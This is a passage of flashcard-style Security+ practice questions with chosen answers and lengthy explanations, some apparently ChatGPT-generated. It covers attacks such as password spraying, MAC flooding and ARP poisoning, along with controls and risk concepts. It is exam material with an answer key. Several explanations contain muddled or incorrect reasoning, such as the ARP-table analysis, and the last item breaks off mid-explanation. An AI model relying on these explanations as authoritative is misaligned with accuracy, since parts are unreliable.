3/16/20 3:31:11 AM Audit Failure : CompanyNetwork\User1 Unknown username or bad password
3/16/20 3:31:12 AM Audit Failure : CompanyNetwork\User1 Unknown username or bad password
3/16/20 3:31:13 AM Audit Failure : CompanyNetwork\User1 locked out
3/16/20 3:31:14 AM Audit Failure : CompanyNetwork\User2 Unknown username or bad password
3/16/20 3:31:15 AM Audit Failure : CompanyNetwork\User2 Unknown username or bad password
3/16/20 3:31:16 AM Audit Failure : CompanyNetwork\User2 Unknown username or bad password
3/16/20 3:31:18 AM Audit Failure : CompanyNetwork\User2 locked out
3/16/20 3:31:19 AM Audit Failure : CompanyNetwork\User3 Unknown username or bad password
3/16/20 3:32:40 AM Audit Failure : CompanyNetwork\User4 Unknown username or bad password
3/16/20 3:33:25 AM Audit Failure : CompanyNetwork\User4 Successful logon

Which of the following attacks MOST likely occurred?

A. Dictionary
B. Credential-stuffing
C. Password-spraying
D. Brute-force

A

C. Password-spraying

Here’s the reasoning:

Password-spraying: In a password-spraying attack, the attacker attempts a few common passwords or a single password against multiple user accounts. The goal is to avoid triggering lockout policies that would occur if multiple incorrect passwords were tried for the same account. The attacker typically tries one password across many accounts to avoid detection.

In the provided logs:

User1 experiences three consecutive failed login attempts followed by a lockout.
User2 experiences three consecutive failed login attempts followed by a lockout.
User3 experiences one failed login attempt.

User4’s log shows a successful login after several failed attempts, which could indicate the attacker was successful in gaining access after a password-spraying attempt.

Reasoning against other options:

Dictionary (Option A): Dictionary attacks involve trying multiple passwords for a single user account, which would likely result in triggering the lockout policy after several failed attempts. This is not consistent with the observed pattern in the logs.

Credential-stuffing (Option B): Credential-stuffing involves using known username/password pairs obtained from previous breaches. It typically targets a large number of accounts but usually involves many more failed attempts in a short time frame than seen here.

Brute-force (Option D): Brute-force attacks involve trying many possible combinations of passwords until the correct one is found. They usually result in triggering lockout policies due to the high number of failed attempts, which is not evident in the provided logs.

Therefore, based on the log entries and the behavior described, password-spraying is the most likely type of attack that occurred, where the attacker tried a single password across multiple user accounts to avoid triggering account lockout policies.

623
Q

Users have been issued smart cards that provide physical access to a building. The cards also contain tokens that can be used to access information systems. Users can log in to any thin client located throughout the building and see the same desktop each time. Which of the following technologies are being utilized to provide these capabilities? (Choose two.)

A. COPE
B. VDI
C. GPS
D. TOTP
E. RFID
F. BYOD

A

B. VDI (Virtual Desktop Infrastructure)

VDI allows users to access a centralized desktop environment (virtual desktop) from any thin client within the building. This ensures consistency of the desktop environment regardless of which thin client is used.

E. RFID (Radio Frequency Identification)

RFID is used in the smart cards issued to users for physical access to the building. These cards also contain tokens that can be used for accessing information systems, likely through a form of authentication mechanism (such as TOTP - Time-Based One-Time Passwords).

Here’s a breakdown of the options:

COPE (Corporate-Owned, Personally Enabled): COPE refers to a corporate-owned device that users can personalize to some extent. It's not directly related to the described capabilities of accessing a consistent desktop environment and using smart cards.

VDI (Virtual Desktop Infrastructure): VDI allows for centralized management of desktops, providing users with the same desktop experience from any location within the building.

GPS (Global Positioning System): GPS is used for location tracking and navigation, not related to desktop virtualization or smart card access.

TOTP (Time-Based One-Time Passwords): TOTP is a form of two-factor authentication that can be used with tokens stored on smart cards for accessing information systems.

RFID (Radio Frequency Identification): RFID is used in the smart cards for physical access and potentially for authentication purposes.

BYOD (Bring Your Own Device): BYOD allows employees to use personal devices for work, which is not directly related to the described capabilities of accessing a consistent desktop environment and using smart cards.

Therefore, VDI and RFID are the technologies being utilized to provide users with the capability to access a consistent desktop environment from any thin client and use smart cards for physical access and system authentication.

624
Q

A security engineer needs to implement an MDM solution that complies with the corporate mobile device policy.
The policy states that in order for mobile users to access corporate resources on their devices, the following requirements must be met:
Mobile device OSs must be patched up to the latest release.
A screen lock must be enabled (passcode or biometric).
Corporate data must be removed if the device is reported lost or stolen.
Which of the following controls should the security engineer configure? (Choose two.)

A. Containerization
B. Storage segmentation
C. Posturing
D. Remote wipe
E. Full-device encryption
F. Geofencing

A

C. Posturing

Posturing refers to the ability to assess and enforce compliance with security policies on mobile devices. It typically involves checking the device’s compliance status, such as OS patch level and screen lock status, before allowing access to corporate resources.

D. Remote wipe

Remote wipe allows the security team to remotely erase corporate data from a device that is reported lost or stolen, thereby ensuring that sensitive information does not fall into unauthorized hands.

Here’s how these controls align with the policy requirements:

Mobile device OSs must be patched up to the latest release: Posturing capabilities can verify the patch level of the device OS and ensure that it meets the latest release requirements before granting access to corporate resources.

A screen lock must be enabled (passcode or biometric): Posturing can check if a screen lock (passcode or biometric) is enabled on the device. Additionally, device management settings can enforce this requirement.

Corporate data must be removed if the device is reported lost or stolen: Remote wipe functionality allows the security team to remotely delete corporate data from a device that is lost or stolen, maintaining data security and compliance with the policy.

Comparatively:

Containerization (Option A): Containerization isolates corporate data in a separate encrypted container on the device but does not directly enforce OS patching or screen lock requirements.

Storage segmentation (Option B): This term typically refers to dividing storage resources for different purposes and is not directly related to enforcing mobile device security policies.

Full-device encryption (Option E): While important for data security, full-device encryption does not specifically address the policy requirements related to OS patching, screen lock, and remote data wipe.

Geofencing (Option F): Geofencing defines geographical boundaries for device usage but is not directly related to enforcing OS patching, screen lock, or remote data wipe policies.

Therefore, posturing and remote wipe are the controls that the security engineer should configure to ensure compliance with the corporate mobile device policy.

625
Q

A systems administrator needs to implement an access control scheme that will allow an object’s access policy to be determined by its owner. Which of the following access control schemes BEST fits the requirements?

A. Role-based access control
B. Discretionary access control
C. Mandatory access control
D. Attribute-based access control

A

B. Discretionary access control (DAC)

Here’s why DAC is the best fit for the requirements:

Discretionary Access Control (DAC): In DAC, access decisions are based on the discretion of the object's owner (or creator). The owner of an object can determine who has access to the object and what permissions those users have. This aligns directly with the requirement that the object's access policy is determined by its owner.

Role-based access control (RBAC) assigns access rights based on roles rather than individual users or owners. While roles can be assigned certain permissions, the owner does not necessarily dictate access policies directly.

Mandatory Access Control (MAC) is typically used in environments where access control is centrally determined based on security labels or classifications, not by individual owners.

Attribute-based access control (ABAC) uses attributes of users, objects, and the environment to make access control decisions. While flexible, ABAC does not explicitly tie access control decisions to an object's owner as in DAC.

Therefore, Discretionary Access Control (DAC) is the access control scheme that best allows the owner of an object to determine its access policy, making it the most suitable choice for this scenario.

626
Q

Which of the following security concepts should an e-commerce organization apply for protection against erroneous purchases?

A. Privacy
B. Availability
C. Integrity
D. Confidentiality

A

C. Integrity

Here’s why:

Integrity: Integrity ensures that data remains accurate, complete, and unaltered. In the context of an e-commerce organization, integrity mechanisms help prevent unintended changes to transactional data, ensuring that purchases are processed accurately and errors are minimized. This can involve techniques such as data validation, checksums, and transaction logging to detect and prevent unauthorized or erroneous changes to purchase orders and transaction records.

While availability (B) ensures that systems and resources are accessible and reliable for legitimate users, confidentiality (D) protects sensitive information from unauthorized access, and privacy (A) ensures that personal information is handled appropriately, integrity specifically addresses the accuracy and reliability of transactional data, which is crucial in preventing erroneous purchases in an e-commerce setting.

627
Q

A network administrator needs to build out a new datacenter, with a focus on resiliency and uptime. Which of the following would BEST meet this objective? (Choose two.)

A. Dual power supply
B. Off-site backups
C. Automatic OS upgrades
D. NIC teaming
E. Scheduled penetration testing
F. Network-attached storage

A

A. Dual power supply
D. NIC teaming
Explanation:

A. Dual power supply: Ensures that if one power supply fails, the other can take over, thereby preventing downtime due to power supply failure.

D. NIC teaming: Involves combining multiple network interface cards (NICs) to act as a single interface, providing redundancy and improved network performance. If one NIC fails, the other can handle the traffic, thus enhancing network resiliency and uptime.

Rationale for Other Options:

B. Off-site backups: Important for data recovery and protection against disasters, but it doesn't directly contribute to the immediate resiliency and uptime of the data center.

C. Automatic OS upgrades: While keeping systems up to date is important, automatic upgrades can sometimes introduce instability or require reboots, which may impact uptime.

E. Scheduled penetration testing: Crucial for security but does not directly contribute to the physical resiliency and uptime of the data center.

F. Network-attached storage (NAS): Useful for centralized storage, but it doesn't directly address network or power resiliency, which are critical for uptime.

Summary:

Dual power supplies and NIC teaming are directly related to ensuring the resiliency and uptime of a data center by providing redundancy for power and network connectivity, respectively.

628
Q

A company’s Chief Information Officer (CIO) is meeting with the Chief Information Security Officer (CISO) to plan some activities to enhance the skill levels of the company’s developers. Which of the following would be MOST suitable for training the developers?

A. A capture-the-flag competition
B. A phishing simulation
C. Physical security training
D. Basic awareness training

A

A. A capture-the-flag competition

Here’s why:

Capture-the-flag (CTF) competition: CTFs are cybersecurity competitions where participants solve challenges related to various aspects of cybersecurity, such as cryptography, web security, reverse engineering, and more. Developers can greatly benefit from CTFs as they involve hands-on problem-solving that reinforces technical skills and encourages critical thinking and collaboration.

Phishing simulation (Option B): Phishing simulations are primarily focused on educating users about identifying and avoiding phishing attacks. While important for overall security awareness, they may not directly enhance the technical skills of developers unless the simulations are tailored to include aspects of secure coding practices or specific developer-related security challenges.

Physical security training (Option C): Physical security training focuses on securing physical assets and facilities. While important for comprehensive security awareness, it is not directly related to enhancing the technical skills of developers.

Basic awareness training (Option D): Basic awareness training typically covers foundational security concepts and practices. While useful for general understanding, it may not provide the depth of technical skill enhancement that developers would benefit from.

Therefore, a capture-the-flag competition would be the most suitable option for training developers, as it provides practical, hands-on experience that can significantly improve their cybersecurity skills in areas relevant to their roles.

629
Q

A cybersecurity administrator has a reduced team and needs to operate an on-premises network and security infrastructure efficiently. To help with the situation, the administrator decides to hire a service provider. Which of the following should the administrator use?

A. SDP
B. AAA
C. IaaS
D. MSSP
E. Microservices

A

D. MSSP (Managed Security Service Provider)

Here’s why MSSP is the appropriate choice:

Managed Security Service Provider (MSSP): MSSPs offer outsourced monitoring and management of security devices and systems. They can provide 24/7 security monitoring, threat detection and response, vulnerability management, and other security services. This helps alleviate the workload on the internal team while benefiting from specialized expertise and resources of the MSSP.

Let’s briefly consider the other options for clarity:

SDP (Software-Defined Perimeter): SDP is a security framework that dynamically creates a "segment of one" between the user and the resources they access. It's a technology rather than a service provider.

AAA (Authentication, Authorization, and Accounting): AAA refers to a framework for controlling access to computer resources. It does not relate directly to hiring a service provider for managing network and security infrastructure.

IaaS (Infrastructure as a Service): IaaS provides virtualized computing resources over the internet. It’s a cloud computing service model, not related to managed security services.

Microservices: Microservices are a software development technique for building applications as a suite of small, loosely coupled services. This is unrelated to hiring a service provider for network and security infrastructure management.

Therefore, MSSP (Managed Security Service Provider) is the best choice for the cybersecurity administrator to efficiently manage the on-premises network and security infrastructure with a reduced team.

630
Q

Which of the following threat vectors would appear to be the most legitimate when used by a malicious actor to impersonate a company?

A. Phone call
B. Instant message
C. Email
D. Text message

A

C. Email

Here’s why:

Email: Malicious actors commonly use phishing emails to impersonate legitimate companies. They can craft emails that appear to come from trusted sources such as official company email addresses or domains. These emails often contain convincing language, logos, and links that mimic legitimate communication from the company. Email is a widely used vector for distributing phishing attempts because it can be mass-mailed to many targets, increasing the likelihood of success.

While phone calls (Option A), instant messages (Option B), and text messages (Option D) can also be used for impersonation, emails are often perceived as more legitimate due to their ability to closely replicate official communication formats and styles. They can include headers, footers, and other elements that mimic the company’s branding and communication standards, making them potentially more convincing to recipients. Therefore, email is the most likely threat vector to appear legitimate when used for impersonation by a malicious actor targeting a company.

631
Q

The SOC is reviewing processes and procedures after a recent incident. The review indicates it took more than 30 minutes to determine that quarantining an infected host was the best course of action. This allowed the malware to spread to additional hosts before it was contained. Which of the following would be BEST to improve the incident response process?

A. Updating the playbooks with better decision points
B. Dividing the network into trusted and untrusted zones
C. Providing additional end-user training on acceptable use
D. Implementing manual quarantining of infected hosts

A

A. Updating the playbooks with better decision points

Here’s why:

Updating the playbooks with better decision points: Playbooks are procedural documents that guide incident response teams through various steps to detect, respond to, and recover from security incidents. By updating the playbooks with better decision points, the SOC can provide clearer guidance on when and how to quarantine infected hosts effectively. This ensures that incident responders have specific criteria and actions to follow, reducing the time it takes to make critical decisions during an incident.

Let’s briefly consider the other options for clarity:

Dividing the network into trusted and untrusted zones (Option B): While network segmentation can help isolate critical systems from less trusted areas, it doesn't directly address the process of improving incident response decision-making or speed.

Providing additional end-user training on acceptable use (Option C): End-user training is important for overall security awareness, but it focuses more on preventing incidents rather than improving incident response processes after an incident has occurred.

Implementing manual quarantining of infected hosts (Option D): Manual quarantining may introduce delays and human error, especially in large environments. Automation or clearer decision points in playbooks are generally more effective for improving response times and accuracy.

Therefore, updating the playbooks with better decision points is the best option to enhance the incident response process by providing clearer, more effective guidance to SOC analysts, thereby reducing response times and mitigating the impact of incidents like malware spreading to additional hosts.

632
Q

A security administrator checks the table of a network switch, which shows the following output:

VLAN Physical Address Type Port
1 001a:42ff:5113 Dynamic GE0/5
1 0faa:abcf:ddee Dynamic GE0/5
1 c6a9:6b16:758e Dynamic GE0/5
1 a3aa:b6a3:1212 Dynamic GE0/5
1 8025:2ad8:bfac Dynamic GE0/5
1 b839:f995:a00a Dynamic GE0/5

Which of the following is happening to this switch?

A. MAC flooding
B. DNS poisoning
C. MAC cloning
D. ARP poisoning

A

A. MAC flooding

Here’s why:

MAC flooding: MAC flooding is a technique used in network attacks where an attacker floods the switch with fake MAC addresses, causing the switch to enter into a state where it forwards traffic to all ports (known as flooding mode) instead of just the appropriate port. This can overwhelm the switch's MAC address table and allow the attacker to intercept network traffic intended for other hosts, potentially enabling various types of attacks.

In the scenario described:

The VLAN is 1, indicating it's the default VLAN.
Multiple MAC addresses (all dynamic) are associated with the same port (GE0/5).

This behavior suggests that the switch’s MAC address table is being flooded with multiple MAC addresses on the same port, which is characteristic of MAC flooding attacks.

Let’s briefly consider the other options for clarity:

DNS poisoning (Option B): DNS poisoning involves corrupting DNS cache data to redirect DNS requests. It does not involve manipulation of MAC addresses on a switch.

MAC cloning (Option C): MAC cloning refers to copying a legitimate MAC address to impersonate a device on a network. This scenario involves multiple different MAC addresses, not cloning a single MAC address.

ARP poisoning (Option D): ARP poisoning involves manipulating ARP (Address Resolution Protocol) tables to associate attacker's MAC address with legitimate IP addresses. It does not directly involve flooding the switch's MAC address table.

Therefore, based on the provided information, MAC flooding is the most likely activity occurring on the switch, where multiple dynamic MAC addresses are associated with the same port, potentially disrupting normal network operation and security.

633
Q

An organization just experienced a major cyberattack incident. The attack was well coordinated, sophisticated, and highly skilled. Which of the following targeted the organization?

A. Shadow IT
B. An insider threat
C. A hacktivist
D. An advanced persistent threat

A

D. An advanced persistent threat (APT)

Here’s why:

Advanced Persistent Threat (APT): APTs are characterized by attackers who have the capability and resources to conduct prolonged and targeted attacks against specific organizations. They typically employ advanced techniques, including reconnaissance, social engineering, and zero-day exploits to gain unauthorized access and remain undetected within the target network for extended periods. APT attackers are often state-sponsored or financially motivated groups with significant technical expertise and resources.

Let’s briefly review the other options for clarity:

Shadow IT (Option A): Shadow IT refers to IT systems or solutions used within an organization without explicit approval or oversight. It does not describe a type of sophisticated cyberattack.

An insider threat (Option B): An insider threat involves individuals within the organization who misuse their access privileges to compromise security. While insider threats can be sophisticated, they are not necessarily characterized by external coordination and highly skilled attackers.

A hacktivist (Option C): Hacktivists are individuals or groups who use hacking techniques for political or social activism purposes. Their attacks are typically motivated by ideology rather than being highly coordinated and sophisticated in nature.

Therefore, given the description of the cyberattack as well-coordinated, sophisticated, and highly skilled, the most appropriate choice is D. An advanced persistent threat (APT), which aligns with the characteristics of a targeted and persistent cyber threat actor with advanced capabilities and resources.

634
Q

A smart switch has the ability to monitor electrical levels and shut off power to a building in the event of power surge or other fault situation. The switch was installed on a wired network in a hospital and is monitored by the facilities department via a cloud application. The security administrator isolated the switch on a separate VLAN and set up a patching routine. Which of the following steps should also be taken to harden the smart switch?

A. Set up an air gap for the switch.
B. Change the default password for the switch
C. Place the switch in a Faraday cage.
D. Install a cable lock on the switch.

A

B. Change the default password for the switch.

Here’s why this is the correct choice:

Changing Default Passwords: Smart switches often come with default passwords that are well-known and easily exploited if not changed. By setting a strong, unique password, you prevent unauthorized access to the switch, which is crucial for security.

Now, let’s evaluate the other options:

A. Set up an air gap for the switch: While physically isolating the switch can enhance security, it's not always practical in a networked environment where monitoring and control via a cloud application are required. Moreover, VLAN isolation already provides a level of segregation.

C. Place the switch in a Faraday cage: Faraday cages are used to shield electromagnetic interference and would not directly address security concerns related to access control or password protection.

D. Install a cable lock on the switch: While physically securing the switch with a cable lock can prevent physical theft or tampering, it does not directly address the need for securing access through passwords, which is more critical in a networked environment.

Therefore, B. Change the default password for the switch is the best step to take alongside VLAN isolation and regular patching routines to enhance the security of the smart switch in the hospital’s network.

635
Q

A company recently set up an e-commerce portal to sell its products online. The company wants to start accepting credit cards for payment, which requires compliance with a security standard. Which of the following standards must the company comply with before accepting credit cards on its e-commerce platform?

A. PCI DSS
B. ISO 22301
C. ISO 27001
D. NIST CSF

A

A. PCI DSS (Payment Card Industry Data Security Standard)

Here’s why PCI DSS is the correct choice:

PCI DSS is specifically designed to ensure the secure handling of credit card information during transactions. It sets forth requirements for organizations that handle credit card payments to protect cardholder data, maintain a secure network, implement strong access control measures, regularly monitor and test networks, and maintain an information security policy.

Now, let’s briefly explain why the other options are not correct:

B. ISO 22301: ISO 22301 is a standard for business continuity management systems, focusing on ensuring organizations can continue operating during and after disruptions. It does not specifically address the security requirements for handling credit card transactions.

C. ISO 27001: ISO 27001 is a widely recognized international standard for information security management systems (ISMS). While it covers comprehensive information security practices, it does not specifically focus on the requirements for securing credit card transactions as PCI DSS does.

D. NIST CSF (NIST Cybersecurity Framework): The NIST CSF provides a framework to improve cybersecurity across various sectors but does not have specific guidelines for handling credit card transactions similar to PCI DSS.

Therefore, A. PCI DSS is the standard that the company must comply with to ensure the security of credit card transactions on its e-commerce platform.

636
Q

A security analyst is investigating an incident that was first reported as an issue connecting to network shares and the Internet. While reviewing logs and tool output, the analyst sees the following:

IP address Physical address
10.0.0.1 00-18-21-ad-24-bc
10.0.0.114 01-31-a3-cd-23-ab
10.0.0.115 00-18-21-ad-24-bc
10.0.0.116 00-19-08-ba-07-da
10.0.0.117 01-12-21-ca-11-ad

Which of the following attacks has occurred?

A. IP conflict
B. Pass-the-hash
C. MAC flooding
D. Directory traversal
E. ARP poisoning

A

E. ARP poisoning

Here’s the reasoning:

ARP poisoning (also known as ARP spoofing) involves manipulating ARP (Address Resolution Protocol) tables on a local area network to associate the attacker's MAC address with the IP address of another device (often the default gateway). This can lead to traffic being redirected through the attacker's machine, allowing for interception and potential modification of data.

In the given logs:

IP address 10.0.0.1 is associated with MAC address 00-18-21-ad-24-bc.
IP address 10.0.0.115 is also associated with MAC address 00-18-21-ad-24-bc.

This inconsistency suggests that there are multiple devices claiming the same IP address (10.0.0.1 and 10.0.0.115) but with different MAC addresses. This aligns with the behavior typically seen in ARP poisoning attacks, where the attacker sends falsified ARP messages to associate their MAC address with a legitimate IP address on the network.

Let’s briefly review why the other options are less likely:

A. IP conflict: While IP conflict could cause connectivity issues, it typically involves two legitimate devices with the same IP address, each having its own MAC address. The provided scenario shows multiple IP addresses being associated with the same MAC address, which is not typical of a straightforward IP conflict.

B. Pass-the-hash: This attack involves capturing hashed credentials from a compromised system and reusing them to authenticate as that user elsewhere. It's not related to the MAC and IP address associations observed in the logs.

C. MAC flooding: MAC flooding involves overwhelming a switch's MAC address table to facilitate a man-in-the-middle attack. The scenario does involve MAC addresses, but the issue here is inconsistent IP-to-MAC address mappings rather than flooding the switch's MAC table.

D. Directory traversal: This attack involves accessing files and directories outside the intended directory structure. It's unrelated to the ARP and MAC address issues described in the logs.

Therefore, based on the provided information, E. ARP poisoning is the most likely attack that has occurred, given the discrepancies between IP and MAC address associations observed in the logs.

637
Q

Which of the following allows for functional test data to be used in new systems for testing and training purposes to protect the real data?

A. Data encryption
B. Data masking
C. Data deduplication
D. Data minimization

A

B. Data masking

Here’s why:

Data masking involves transforming sensitive data in a way that it looks realistic but is not real. This allows functional testing, training, and other non-production purposes to proceed without exposing real sensitive information. For example, masking credit card numbers by replacing digits with other characters or symbols.

Let’s briefly explain why the other options are not correct:

A. Data encryption: While data encryption secures data by encoding it in a way that only authorized parties can decrypt and access it, it does not inherently protect the use of functional test data. Encrypted data, when decrypted, still reveals real sensitive information.

C. Data deduplication: Data deduplication refers to the process of eliminating duplicate copies of data, which reduces storage needs and enhances data integrity but does not protect data for testing purposes.

D. Data minimization: Data minimization involves reducing the amount of personal data collected and processed to only what is necessary for the specified purpose. It is a principle of data protection but does not address the specific need to protect real data when using functional test data.

Therefore, B. Data masking is the method that allows for functional test data to be used in new systems for testing and training purposes while protecting the real data from exposure.

638
Q

A company recently moved sensitive videos between on-premises, company-owned websites. The company then learned the videos had been uploaded and shared to the Internet. Which of the following would MOST likely allow the company to find the cause?

A. Checksums
B. Watermarks
C. Order of volatility
D. A log analysis
E. A right-to-audit clause

A

D. A log analysis
Explanation:

Checksums: Useful for verifying data integrity but won't directly identify the cause of videos being uploaded and shared.

Watermarks: Typically used for identifying ownership or origin of content but may not reveal the cause of unauthorized sharing.

Order of volatility: Refers to the sequence in which data should be preserved or collected during an investigation. While important, it's more about preserving evidence than identifying the cause of the incident.

A log analysis: This involves reviewing logs from various systems (such as web servers, file servers, access logs) to trace the movement and access of the videos. It can help identify who accessed the videos, from where, and possibly how they were shared online.

A right-to-audit clause: This could potentially allow the company to audit the systems and logs of third parties involved, but it's more about legal rights than direct technical investigation.

Therefore, D. A log analysis would be the most appropriate step to investigate and identify the cause of the sensitive videos being uploaded and shared on the internet after their movement between company-owned websites.

639
Q

A public relations team will be taking a group of guests on a tour through the facility of a large e- commerce company. The day before the tour, the company sends out an email to employees to ensure all whiteboards are cleaned and all desks are cleared. The company is MOST likely trying to protect against:

A. loss of proprietary information.
B. damage to the company’s reputation.
C. social engineering.
D. credential exposure.

A

(Community : A 75%, D 25%)
The company is likely taking precautions to avoid the accidental disclosure of sensitive or proprietary information. Whiteboards and desks can often contain information regarding internal processes, projects, or data that the company would not want to be disclosed to the public or competitors. By cleaning whiteboards and clearing desks, the company is reducing the risk of unintentional exposure of proprietary information during the facility tour.

ChatGPT :
A. loss of proprietary information.
Explanation:

Loss of proprietary information: Cleaning whiteboards and clearing desks can help prevent sensitive or proprietary information from being inadvertently exposed to visitors who are not authorized to see such information. This precaution ensures that confidential details or strategic plans are not visible, thereby protecting the company's proprietary information.

Damage to the company's reputation: While keeping desks and whiteboards tidy can indirectly protect the company's reputation by presenting a professional image, the primary concern here seems to be about preventing the exposure of sensitive information rather than directly guarding against reputational damage.

Social engineering: While tidying up could mitigate some risks associated with social engineering by reducing visible information that could be exploited, this is not the primary focus in this scenario.

Credential exposure: Cleaning desks and whiteboards would not directly address the exposure of credentials; this is more related to secure handling of access credentials and passwords.

Therefore, the most likely reason for the company’s action is to prevent loss of proprietary information by ensuring that sensitive details are not visible during the facility tour.

640
Q

Which of the following BEST explains the reason why a server administrator would place a document named password.txt on the desktop of an administrator account on a server?

A. The document is a honeyfile and is meant to attract the attention of a cyberintruder.
B. The document is a backup file if the system needs to be recovered.
C. The document is a standard file that the OS needs to verify the login credentials.
D. The document is a keylogger that stores all keystrokes should the account be compromised.

A

A. The document is a honeyfile and is meant to attract the attention of a cyberintruder.

Here’s why:

Honeyfile: A honeyfile is a deceptive file intentionally placed in a system to attract and monitor unauthorized access attempts. By naming a file such as password.txt, the administrator is creating a file that appears to contain sensitive information (like passwords), enticing potential intruders to interact with it. This allows the administrator to detect and monitor unauthorized access attempts and potentially gather information about the intruder's methods.

Let’s briefly review why the other options are less likely in this context:

B. Backup file: A backup file would typically not be named password.txt unless it's specifically designated for storing passwords, which is highly unusual and insecure practice.

C. Standard OS file: Operating systems do not typically require a file named password.txt on the desktop for login credential verification. Verification processes are usually handled through more secure and internal mechanisms.

D. Keylogger: A keylogger is malicious software used to record keystrokes without the user's knowledge. A keylogger would not be openly placed as a file named password.txt on the desktop, as this would not effectively capture keystrokes covertly.

Therefore, A. The document is a honeyfile and is meant to attract the attention of a cyberintruder aligns with the strategy of using deception to monitor and potentially thwart unauthorized access attempts on a server.

641
Q

A security analyst needs to generate a server certificate to be used for 802.1X and secure RDP connections.
The analyst is unsure what is required to perform the task and solicits help from a senior colleague. Which of the following is the FIRST step the senior colleague will most likely tell the analyst to perform to accomplish this task?

A. Create an OCSP.
B. Generate a CSR.
C. Create a CRL.
D. Generate a .pfx file.

A

B. Generate a CSR (Certificate Signing Request).

Here’s why:

CSR (Certificate Signing Request): A CSR is a request sent to a Certificate Authority (CA) to apply for a digital identity certificate. It includes information such as the organization's details and the public key that will be included in the certificate.

When setting up a server certificate for 802.1X (used for secure network authentication) and secure RDP connections (Remote Desktop Protocol), the CSR is the initial step because it defines the details and requirements for the certificate that will be issued by the CA. The CSR is typically generated on the server where the certificate will be installed, ensuring that the certificate is tied to the correct server and its public key.

Let’s briefly review why the other options are less likely as the FIRST step:

A. Create an OCSP: OCSP (Online Certificate Status Protocol) is used to check the revocation status of a certificate. It comes into play after the certificate has been issued and is used to ensure its validity. Creating OCSP is not the initial step in requesting a certificate.

C. Create a CRL (Certificate Revocation List): A CRL is a list of certificates that have been revoked by the CA before their expiration date. Like OCSP, creating a CRL is not the initial step in requesting a new certificate.

D. Generate a .pfx file: A .pfx (Personal Information Exchange) file is a format for storing a certificate and its associated private key. While .pfx files are used to store and transfer certificates, generating a .pfx file comes after obtaining the server certificate, which is initiated by generating a CSR.

Therefore, B. Generate a CSR is the correct first step to initiate the process of obtaining a server certificate for 802.1X and secure RDP connections.

642
Q

When selecting a technical solution for identity management, an architect chooses to go from an in-house solution to a third-party SaaS provider. Which of the following risk management strategies is this an example of?

A. Acceptance
B. Mitigation
C. Avoidance
D. Transference

A

D. Transference

Here’s why:

Transference in risk management involves shifting the responsibility for managing a risk to another party. By opting for a third-party SaaS provider for identity management, the architect is transferring the operational and security risks associated with maintaining an in-house solution to the SaaS provider. This includes aspects such as data security, compliance, scalability, and ongoing maintenance.

Let’s briefly review the other options to clarify why they are less applicable in this scenario:

A. Acceptance: Acceptance involves acknowledging the existence of a risk without taking specific action to mitigate it. Transitioning to a SaaS provider is an active decision to address the risks associated with in-house management rather than simply accepting them.

B. Mitigation: Mitigation involves taking actions to reduce the impact or likelihood of a risk. While moving to a SaaS provider may reduce certain risks compared to an in-house solution, the primary action here is transferring the risk rather than mitigating it directly.

C. Avoidance: Avoidance means eliminating the risk altogether by avoiding the activity that gives rise to the risk. Transitioning to a SaaS provider does not avoid identity management; rather, it changes how it is managed.

Therefore, D. Transference accurately describes the risk management strategy in this scenario where the architect chooses to move identity management responsibilities from an in-house solution to a third-party SaaS provider.

643
Q

Which of the following describes the BEST approach for deploying application patches?

A. Apply the patches to systems in a testing environment, then to systems in a staging environment, and finally to production systems.

B. Test the patches in a staging environment, develop against them in the development environment, and then apply them to the production systems.

C. Test the patches in a test environment, apply them to the production systems, and then apply them to a staging environment.

D. Apply the patches to the production systems, apply them in a staging environment, and then test all of them in a testing environment.

A

A. Apply the patches to systems in a testing environment, then to systems in a staging environment, and finally to production systems.

Here’s why this approach is generally considered the best practice:

Testing Environment: Patches should first be applied to a testing environment where their impact can be thoroughly assessed. This allows for testing against various configurations and potential interactions with existing systems and applications without risking disruption to production.

Staging Environment: After successful testing in the testing environment, the patches should be applied to a staging environment that closely mimics the production environment. This further verifies their compatibility and ensures that the deployment process itself is well understood and can be replicated in production.

Production Systems: Finally, once the patches have been successfully tested in both testing and staging environments, they can be applied to production systems. This staged deployment approach minimizes the risk of unforeseen issues affecting critical operations and allows for any necessary adjustments based on the testing and staging experiences.

Let’s briefly review why the other options are less optimal:

B. Test the patches in a staging environment, develop against them in the development environment, and then apply them to the production systems: This option suggests developing against patches after testing in staging, which could lead to complications if the patches behave differently in development than in staging or production.

C. Test the patches in a test environment, apply them to the production systems, and then apply them to a staging environment: Applying patches directly to production before testing in staging increases the risk of disruptions or issues that could have been identified and mitigated in a staging environment.

D. Apply the patches to the production systems, apply them in a staging environment, and then test all of them in a testing environment: This approach risks deploying untested patches directly to production, which can lead to downtime or other critical issues if the patches have unforeseen consequences.

Therefore, A. Apply the patches to systems in a testing environment, then to systems in a staging environment, and finally to production systems is the best approach for deploying application patches, ensuring thorough testing and minimizing the risk of disruption to production systems.

644
Q

A small business just recovered from a ransomware attack against its file servers by purchasing the decryption keys from the attackers. The issue was triggered by a phishing email and the IT administrator wants to ensure it does not happen again. Which of the following should the IT administrator do FIRST after recovery?

A. Scan the NAS for residual or dormant malware and take new daily backups that are tested on a frequent basis.
B. Restrict administrative privileges and patch all systems and applications.
C. Rebuild all workstations and install new antivirus software.
D. Implement application whitelisting and perform user application hardening.

A

B. Restrict administrative privileges and patch all systems and applications.

Here’s why:

Restrict Administrative Privileges: Limiting administrative privileges reduces the likelihood of malware being able to execute with elevated permissions, which can mitigate the impact of future attacks, including ransomware.

Patch All Systems and Applications: Ensuring all systems and applications are up-to-date with the latest security patches closes known vulnerabilities that attackers often exploit, such as those used in phishing attacks to deliver ransomware.

Let’s briefly review why the other options are less suitable as the FIRST action:

A. Scan the NAS for residual or dormant malware and take new daily backups that are tested on a frequent basis: While scanning for malware and implementing robust backup strategies are important measures, they are secondary to addressing immediate vulnerabilities through privilege restriction and patching.

C. Rebuild all workstations and install new antivirus software: While rebuilding workstations and installing antivirus software are good practices for enhancing security posture, they are not as immediately critical as restricting privileges and patching to prevent immediate re-exploitation.

D. Implement application whitelisting and perform user application hardening: Application whitelisting and user application hardening are effective security measures but are typically implemented after foundational security measures like privilege restriction and patching.

Therefore, B. Restrict administrative privileges and patch all systems and applications should be the FIRST action taken by the IT administrator to mitigate the risk of another ransomware attack following recovery from the phishing-triggered incident.

645
Q

After entering a username and password, an administrator must draw a gesture on a touch screen. Which of the following demonstrates what the administrator is providing?

A. Multifactor authentication
B. Something you can do
C. Biometrics
D. Two-factor authentication

A

B. Something you can do
Explanation:

Multifactor authentication (MFA) typically involves combining two or more different factors for authentication, such as something you know (password), something you have (smartphone token), or something you are (biometric trait).

